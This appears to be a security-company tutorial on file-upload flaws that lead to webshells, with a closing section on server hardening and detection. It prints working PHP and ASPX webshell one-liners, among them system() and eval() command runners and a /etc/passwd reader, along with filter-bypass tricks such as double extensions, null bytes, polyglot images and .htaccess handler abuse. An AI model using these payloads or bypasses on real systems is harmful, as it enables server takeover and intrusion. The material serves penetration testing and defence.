File upload vulnerabilities (CWE-434, Unrestricted Upload of File with Dangerous Type) let attackers drop webshells: small server-side scripts that provide remote command execution, file management and persistence on a web server. Once the uploaded file is reachable over HTTP and the server executes it, a simple validation flaw becomes full control of the host.
Attackers and red teams still favor PHP (the most common target, typically Apache or Nginx with PHP-FPM) and ASP/ASPX (IIS on Windows). The goal is an unrestricted upload that leads to remote code execution (RCE).
Why File Upload → Webshell Matters
1. Real-world impact: One successful upload gives persistent access to the web server. From there attackers identify the account they are running as (whoami), read files from the server, move laterally inside the victim's network and, in the worst case, deploy ransomware across the organization.
2. Common entry points: Profile pictures, avatars, document uploads and poorly validated CMS plugins all give an attacker a way to place a file on the web server.
3. Observed attack chain: Weak filter bypass → file upload → privilege escalation → lateral movement; this chain has been observed in Clop, LockBit and RansomHub intrusions.
Classic Minimal Webshells
PHP examples (still the most common in current use):
1. Basic command execution: <?php system($_GET['cmd']); ?> Access: shell.php?cmd=whoami → returns the account the web server runs as (e.g. www-data).
2. File read (fixed target, no parameter): <?php echo file_get_contents('/etc/passwd'); ?>
3. Versatile mini-shell (runs only when a cmd parameter is present, so a bare request to the file shows nothing): <?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>
4. China Chopper style (tiny, popular in 2025 campaigns): <?php @eval($_POST['pass']); ?> The POST parameter name (here pass) is the shared secret; its value is arbitrary PHP that eval executes, and the @ suppresses error output. There is no real authentication, only knowledge of the parameter name.
ASP/ASPX Examples (Windows/IIS):
1. Command execution with output returned: <%@ Page Language="C#" %><% var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request["cmd"]) { RedirectStandardOutput = true, UseShellExecute = false }; Response.Write(System.Diagnostics.Process.Start(psi).StandardOutput.ReadToEnd()); %> Access: shell.aspx?cmd=whoami (StandardOutput can only be read when RedirectStandardOutput is true and UseShellExecute is false.)
2. Blind execution (the command runs but nothing is returned to the caller): <%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %> Useful when the goal is simply to run a dropper or when output can be retrieved another way (a file written under the web root, DNS).
These payloads are delivered through an intercepted upload request in Burp/ZAP or with curl. The following tools help with fuzzing and bypassing upload filters:
1. Upload_Bypass (GitHub: sAjibuu/Upload_Bypass): a Python command-line utility that fuzzes upload filters, automates common bypass techniques and delivers a payload in several server-side formats (PHP/ASP/JSP).
Upload_Bypass supports the following bypass techniques:
(1) Double extensions (e.g. shell.php.jpg)
(2) Trailing dots (shell.php.)
(3) Null bytes (shell.php%00.jpg)
(4) MIME type spoofing (Content-Type: image/jpeg on a .php file)
(5) Polyglot files (a valid image carrying PHP code), and more
(6) A check of whether the upload location is web-executable, driven by a captured upload request (-r request.txt)
2. PayloadsAllTheThings: Upload Insecure Files (GitHub: swisskyrepo/PayloadsAllTheThings): a large collection of bypass payloads for PHP/ASP, including .htaccess tricks, polyglot images with embedded PHP and magic-byte manipulation.
3. Webshells shipped with Kali Linux: Kali installs a set of ready-made web shells under /usr/share/webshells/, sorted into subdirectories by language (php, asp, aspx, jsp, cfm, perl). The php directory holds two of the best known: simple-backdoor.php (a one-parameter command runner) and php-reverse-shell.php (pentestmonkey's reverse shell, which needs the attacker IP and port edited in before upload), among others.
4. China Chopper and Godzilla: China Chopper is a very small (about 4 KB), password-protected web shell whose server-side component is essentially the eval one-liner shown above; a separate client handles command execution, file management and database access. Godzilla is a more capable shell that encrypts its traffic (defeating simple WAF signatures) and has server-side variants in PHP, ASP/ASPX and JSP; it is typically seen in targeted intrusions. (Use these only in a lab environment.)
5. B374K, c99 and r57: classic, fully featured PHP web shells that still show up in opportunistic scanning of internet-facing hosts. All three offer file management, command execution, SQL queries and reverse (back-connect) shells to the attacker's machine.
Real-World Bypass & Upload Scenarios
1. Image upload → PHP shell bypass: Rename shell.php to shell.php.jpg (executes on Apache where a mod_mime AddHandler directive maps any .php segment of a multi-extension filename to PHP) or use shell.asp;.jpg on legacy IIS 6, which truncates the name at the semicolon. Polyglot: a GIF89a header followed by PHP code is both a valid image and an executable script.
2. Blacklist evasion: Alternative extensions .php5, .phtml, .php7, .phar (whichever the server's handler mapping still covers). Case variation: .PhP defeats a case-sensitive blacklist on Windows (case-insensitive filesystem) and on Apache, whose mod_mime compares extensions case-insensitively.
3. Content-Type spoofing: Intercept the request in Burp and change Content-Type to image/jpeg while the filename still ends in .php; servers that validate only the declared MIME type accept it.
4. Abuse of .htaccess on Apache shared hosts: If the upload directory honours .htaccess (AllowOverride FileInfo or All), an attacker uploads one containing AddType application/x-httpd-php .jpg, after which any uploaded .jpg with embedded PHP is executed.
5. Path disclosure: Upload responses or error messages that reveal the storage path tell the attacker exactly where the file landed, so it can be triggered directly at http://target/uploads/shell.php.
Detection and Protection - For Defenders
1. Server Hardening
a) Disable dangerous PHP functions in php.ini: disable_functions = system, exec, passthru, shell_exec, proc_open, popen. Note that eval is a language construct, not a function, so disable_functions cannot block it.
b) On IIS, remove handler (script) mappings for every extension the application does not use, and disable script execution on the upload directory.
c) Store uploads outside the web root under a server-generated random name, and serve them back through an application script that sets a safe Content-Type.
2. WAF / ModSecurity: block common webshell indicators such as eval(, system( and <?php in uploads and request bodies. Treat this as defence in depth only; encoded or encrypted shells (Godzilla) pass signature checks.
3. Monitoring: alert when web server processes (w3wp.exe on IIS; apache2, nginx or php-fpm on Linux) spawn cmd.exe, powershell.exe, sh, bash or other unexpected child processes, and watch for files with executable extensions appearing in upload directories.
Weak validation is the root cause of webshells delivered through file uploads. Start testing with one-liners and progress to fully featured tools, but only in a controlled manner and only for purposes sanctioned by an appropriate authorizing entity.
© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067